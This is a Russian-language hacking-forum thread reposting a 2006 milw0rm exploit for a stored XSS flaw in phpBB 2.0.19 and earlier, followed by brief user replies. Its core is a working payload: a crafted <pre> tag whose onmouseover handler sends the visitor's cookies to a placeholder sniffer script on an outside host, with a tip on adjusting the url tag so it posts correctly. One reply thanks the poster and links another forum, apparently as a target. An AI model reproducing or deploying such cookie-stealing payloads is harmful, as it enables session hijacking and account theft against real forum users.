Форум АНТИЧАТ - phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit (https://forum.antichat.xyz/showthread.php?t=13675)

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

Код:

<pre a='>' onmouseover='document.location="http://адрес_сниффера/сниффер.php?c="+document.cookie' b='<pre' >



[url_]http://www.somesite.com/[/url_]</pre>

* в теге [url_] убираем знак подчеркивания "_".

# milw0rm.com [2006-01-29]

thankss....http://www.turkhackerler.com/forum ===>> 2.0.19 :D thank you Rebz..

Прикольно а сам нашёл ии где то взял?

Цитата:

Сообщение от SanyaX

Прикольно а сам нашёл ии где то взял?

Цитата:

# milw0rm.com [2006-01-29]

Цитата:

Сообщение от Antichat.Ru

Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 5 символов.

мда =)

уязвимость работает только с включеным Html на форуме, а таких форумов единицы =(